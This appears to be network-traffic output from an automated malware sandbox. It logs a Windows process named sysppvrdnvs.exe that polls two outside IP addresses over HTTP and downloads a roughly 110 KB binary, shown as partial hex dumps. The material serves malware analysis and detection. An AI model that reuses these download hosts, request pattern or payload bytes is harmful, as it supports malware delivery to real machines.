                                                                                                                                                                                            Data Ascii: \? A&.*TiVYx0d7utnIC[Lb#i61B@+S"Q(d`5Z623y|)_5,I#8\I2*b-s\o5:.K/5h'frVg5|PTya{CWUJ3KtSkwd>~$k_D:[u]V%r


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            16192.168.2.65001091.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:49.201984882 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560899973 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:49 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560971022 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:49 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561108112 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:49 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            17192.168.2.65001291.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:52.705173016 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:53.559186935 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:53 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            18192.168.2.65001391.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626848936 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:56.509474993 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:56 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            19192.168.2.65001591.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:58.683264017 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:59.587367058 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:59 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            20192.168.2.65001691.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:01.729651928 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:02.679735899 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:02 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            21192.168.2.650018185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:06.002042055 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897535086 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:06 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 110600
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a94a-1b008"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                            Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897577047 CEST212INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                            Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897631884 CEST1236INData Raw: 83 e4 d1 90 29 7c aa 52 61 69 3e 26 79 cf e3 2b a4 eb a0 86 89 ee 8f 0a 65 18 75 20 96 42 1b 55 48 d4 6a a3 7b 79 30 ed be 6d a7 6c 87 55 ef 22 c3 f5 94 c8 33 a5 83 53 2b c4 c3 b9 90 cf 8a 0c fc cb a5 49 29 7e ad f0 f9 35 44 58 bc b7 23 1f 6f 26
                                                                                                                                                                                            Data Ascii: )|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&Q{[Y`,OCG"GX! (|h'RTg$^,u1^*qd*cQm3PwL&izY
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897689104 CEST1236INData Raw: 02 73 94 7c 14 0e aa f5 e2 b8 40 61 24 1a 40 15 ef 62 57 45 85 0a 95 13 1c 99 a6 67 55 34 b3 4c e3 6c c9 df 4c b8 f9 00 9a a1 41 71 99 93 d4 bc b8 1e a9 35 3b 7a a6 23 40 95 fb d1 4d 91 a1 81 38 02 69 ff 64 38 a9 5b 0c b3 79 81 37 2a d8 94 b2 70
                                                                                                                                                                                            Data Ascii: s|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897720098 CEST124INData Raw: 17 5f 0f 70 34 1e ae a2 24 cb 91 81 c7 90 a6 02 38 63 65 e1 35 a7 5c 4a fc a5 a0 41 7c fa ab ec 4d 5a 7a a8 cd f3 9d 2c c0 4a b6 e1 08 2d bf 09 5a 6f 0c 55 f3 a1 ca 08 53 b9 2d 96 2c f5 54 d0 f6 e9 c7 e4 16 91 cf 60 d5 69 da 3f 60 78 a9 71 63 5b
                                                                                                                                                                                            Data Ascii: _p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897757053 CEST1236INData Raw: f5 a2 e6 ca 87 f3 9f 2e 7f 2c f3 b9 08 6a 41 ba db af 20 e9 e2 b7 95 be 45 10 38 78 59 38 68 e6 91 4c ab 89 0a 4a 50 69 af 16 7c 4b 8c 1e ad b2 11 f5 6c d5 33 a8 b6 4b 4b 9b 3f e5 d7 4f 0d 8c cc 6e 56 26 e2 b9 20 4b dd b1 79 a5 8d 4c 31 64 ca 36
                                                                                                                                                                                            Data Ascii: .,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Ddr(dL]VcX/N=kT,f\&Kk~DMub;/Gf%A&>thWZq.%?!Us. |v
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897794962 CEST212INData Raw: 1b b0 93 c9 de b9 46 ee a5 73 e6 65 44 70 3f a1 58 37 a8 99 36 bc 4a 9e f8 99 c0 07 b3 5e 5c 3d 6f 6e c5 cc aa 6b a5 3d fb cc e7 a4 0a a5 a4 c2 ff c3 c7 a3 5c f3 df 14 48 6d 79 fa 1a 18 c2 ef 59 b9 63 dc 45 fe fb c6 ac 4a 9d bd 95 10 cf 49 fd b2
                                                                                                                                                                                            Data Ascii: FseDp?X76J^\=onk=\HmyYcEJI4B15't=ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:V
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897825956 CEST1236INData Raw: 74 56 0f 42 c0 44 38 5e e6 c7 65 8c 60 2c 8e 69 fd 01 64 48 be cb 64 38 13 c5 14 e4 48 9d 30 0f 22 fc 81 11 80 90 1f 8b 5f eb 89 c2 5d 3e 34 b8 a9 85 f4 5d d5 0f d4 9f 06 ab 32 f7 33 42 e1 0c 49 a2 a6 5a ab 3f 5b 4c 9b ab a7 93 78 49 58 7e 9d ff
                                                                                                                                                                                            Data Ascii: tVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8kgy$"?uHB3GRH(:5N:AYovR[tn:;3or+[y<_%Q(gUb7
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897861958 CEST1236INData Raw: 32 fc 1a f2 64 6f 2a 7a 08 3a 3d ce e2 4a 9c 2d f1 56 1f 6d 86 e6 4d 5b 27 3a 35 02 30 6f 9d ac 4e c4 a7 6e 5f b1 ad d8 1e 3a 4f c2 73 c2 7d b6 ea 84 ae 88 ff 9b 95 5e be 07 c4 7e 73 99 48 2e ed a0 49 64 75 23 9a 7d a9 f3 cf e4 9d 48 9e 05 d3 86
                                                                                                                                                                                            Data Ascii: 2do*z:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/*V\3V*W]1`iw6m*@Ie"oUl*#^rSZtk.[D`i!A&\NtYJ@xi}S
